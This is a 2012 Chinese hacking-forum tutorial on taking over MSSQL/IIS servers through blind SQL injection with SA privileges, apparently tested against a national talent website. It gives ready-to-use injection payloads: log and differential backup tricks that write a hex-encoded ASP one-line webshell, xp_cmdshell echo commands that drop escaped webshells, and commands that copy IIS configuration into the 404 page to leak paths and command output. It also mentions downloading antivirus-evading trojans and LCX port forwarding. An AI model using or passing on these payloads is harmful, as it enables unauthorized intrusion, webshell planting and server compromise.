找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2228|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
+ F- e! j! ^+ y. \3 \$ g, H$ v& w& {# n5 d: i) b) k* g
0 _  _3 g" |  D3 a4 z& x
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
- f7 D2 n/ d$ e2 B* S# u# W  d4 h
0 h+ [% z) `5 H% y( J0 s# U8 j                                                                 
2 I- ~0 \' d3 L) G6 |4 B8 Y                                                                 
1 {8 U9 |1 a; [  P4 r                                                                  论坛: http://www.90team.net/
* `) L& o% z9 }- B& Y, T( Z! m- `( y9 ~" e
) h0 k: @# n; `
2 ~' j! R5 E& u7 {. a
友情检测国家人才网
, C  X, ~( n, C+ R( b4 g7 L* A( _6 t( P! q; C$ s
  H$ @; r1 q! e# |' h+ M
内容:MSSQL注入SA权限不显错模式下的入侵
8 e' Y- O3 R; x4 }% Z  i6 a% j+ i, r( x

( ^* D% {  }. F; P0 R8 y/ o一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
) E' P$ X8 ^- S+ j5 p4 d9 j8 h- P
/ U' a* ]4 U0 }; B我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
! e6 [! s: A9 F4 Y9 O5 x9 |! `9 x$ l4 l- e9 l; V4 Z

! q3 a; a5 P5 \  |9 k, {# D这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
8 J+ R$ d: d- j9 c3 t3 v- `: Q& W0 x% r. w$ k, T& {! j7 h
思路:
6 o+ t$ Y; W- r: I! P4 [2 O6 @( Q* `) l" |+ x* Y/ X
首先:# i. a: a; c6 [! i/ X+ O
/ b$ A/ A9 U0 g9 y: i
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
, P1 _, Y  {$ A, Z) q8 [9 K1 }5 c$ B; S' T4 F
1.日志备份获得Webshell( I$ c, ^& l. o5 w; [- m5 w5 k4 D

! o- K- b& L, ]  S& v2.数据库差异备份获得Webshell
1 m' J* N- U' w, }
2 p2 |' D$ l1 ]# ^4 {4.直接下载免杀远控木马。, v; I6 z) u4 G, W- N8 {" }

$ D6 \% _0 {8 L6 G7 Y% p5.直接下载LCX将服务器端口转发出来! q1 w0 k8 ^  ^

7 g5 F5 g! n$ B: R4 F6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。3 r4 v! }4 t/ h, w. M
! m0 N) K, `3 q

, U1 Q* }4 o$ g2 X4 A6 K  D5 e
1 }  {  z# e, X" ~1 N4 t在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
( C: c9 @9 {  G6 I8 u
/ T3 c! J$ U) |& R& a; R我直接演示后面一个方法
9 d5 }( o6 s! y/ O9 f! w. ^
6 y9 f7 z$ Y' c- @; _. V2 E2 y* f5 d3 a& I% g; Q6 Z
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 7 z1 w3 q+ L3 q/ T. x

2 c5 [2 t3 O/ M. a& w; L& M4 g6 Y! Q; u! o
4 {4 w( r. R# d" p$ Q

9 `1 E/ S5 D  @◆日志备份:
) R: N% E1 v( ?: J5 N1 I/ {  |7 O  f; @! p1 u" }* D  D" A7 @- [
. z0 D/ ]+ q2 P* G/ }2 @
1. 进行初始备份' s0 |0 K5 M; X
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
, K: d8 x0 h5 k% S% c" m5 U
6 v1 v9 I5 {# L0 U4 c2 G* J- N2. 插入数据# c6 p0 P/ Z$ {- Y  ^( a" `
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
, j- u' l% W; u4 M9 }
2 `( O; J, k/ R1 U# b( l( n' G+ Q0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
3 l* w/ ?8 O+ {  8 k1 w" I- `& x6 b% T
3. 备份并获得文件,删除临时表2 h- n8 T. Y$ G- ^2 V
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--: L- `; n4 C, J1 y

# s' e; ^4 i7 j& d: X
: m5 U' @* n! F" y9 r7 X) Z
# ~$ D  F0 ^4 s" @◆数据库差异备份& ~% u9 A  G2 g4 q( t/ c
; @# {7 g, e1 j" t5 E2 }; ^& b
(1. 进行差异备份准备工作
3 h9 p5 \! @, a& A+ `- z' p
# G, k0 X. T  b% Z;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--, H: G% y+ ^4 m5 `

4 p4 v. u/ j2 s/ P上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
8 n0 P7 P4 `  d; k
% y& M6 o; k9 y6 m
/ N4 Y7 C, |$ d1 n(2. 将数据写入到数据库- `7 m  _! X8 v* D6 v9 Y
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
. |2 k$ k3 S* o6 A6 i3 d
# B& ^- d. v; y  b5 x5 J3 K0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ B) g+ J* N, b0 p
  G5 w. T6 [" B  e+ L5 q5 |1 w2 z# q+ x. I3. 备份数据库并清理临时文件
3 {; w9 M  ?1 [# a  ~3 ~2 A3 F0 @0 n( C
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
# e3 o6 w  q/ A$ f+ C4 q- ]
2 R; C- C9 t9 F: b' z! J0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 8 L/ C! H$ Y7 I8 h# _) e4 R9 B

* z5 X: i3 l2 f4 }
' D2 Q) b3 p( }4 }5 g
% _- y. {4 c4 U, L  h用^转义字符来写ASP(一句话木马)文件的方法:   
! _9 y  l! P5 N2 _" g
' ?% S- S8 C5 x! d$ i& Q1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
; D  E# k2 Q8 A( E
3 w$ h% w" T( R0 h2 l2 W8 H  t2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp : G) l+ N, S# H. n0 i' N, T* E
4 N4 ^- U+ N* N. x* h4 J
读取IIS配置信息获取web路径
% m' _' \8 k: o) u& S9 l
9 x3 u& h7 C& P6 B8 }     % x+ k0 F( r4 v' c
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
/ ~6 D0 E7 V' F( j1 v$ J2 l  Y5 `8 |# l* G- r3 b
执行命令& l4 f2 h: B* h
     . @7 n, }- S/ R8 v. n
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
  n- s4 |1 B( d/ e2 g( ]/ w* L; J; W5 @+ ~
; h6 Y+ ?: k* m2 L

  f$ m) n* a% r) b
# q4 H8 Z5 x9 N/ A5 Q
& G" U7 U2 ~) p' y- ^, Y% v6 \3 {& |- q+ I& i3 c! q

* `. H5 k1 J2 w1 k  v# b% p- \9 G4 Z% M2 M# o( R9 h
% S, [+ v5 Z% D& r, T

3 p3 S, ?0 `  D7 N& j+ Z2 Q* J  h% [! d& `$ x+ b# T/ [

4 y( o7 ]8 ?2 m
4 _2 R; o$ f6 o$ U. ~+ B+ Y
6 V  ~: i: L: Y  L
4 N1 |1 [5 F$ B0 o, l9 W! P- s* Y. N1 [$ L4 [. N
) D3 F# Q' e' ]; Z1 R' W2 P/ F
' N7 M1 r8 Y& N$ \0 F* w& b/ S
+ B, r4 @* r. q: u8 Q5 V. A

% a' T, Y2 w3 z+ ?/ D( q2 V" b1 A7 F
% a: z% c5 T) K: t5 z

& l8 {" J, ^$ v
; H0 H/ T5 \! \7 [: `1 x
& ]% D- o$ R9 T% B! u2 `1 T; @/ o

# t3 x  M. W" `. a7 j' j
) m8 B0 j5 h9 N, U: o
+ N1 W0 l" \' A& b# P, W5 G( r. \' H5 [2 v
+ p4 ^" I4 p4 R$ Q

) h; K2 e. V3 y9 Z0 j" @$ J9 C0 n: |& O# u# [7 _
7 W/ L8 J0 n+ V6 W% J  V6 e, ^
/ _/ _8 |& w: `2 @0 R
  H# n1 t: H5 c# a. n

( q0 n* x# B% K: |2 T8 i% z
  i6 M  D4 g# R# f* y& ~* `) j1 e: f$ T; p' l  \+ y

+ O& I- Z! \6 q, Q" Z8 X( |
% {4 ?3 c' P# b, Q7 n+ h
$ H/ J2 o8 U' @0 b2 \/ M2 X( N1 K6 E8 S' T0 K* H' ~+ y

% ?. E  c  M% v) s' s+ r
) Z2 f/ T5 R+ A
# A* E8 W& m- i( A- h7 j  i  S+ t

% L8 j& `1 {/ }) y9 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表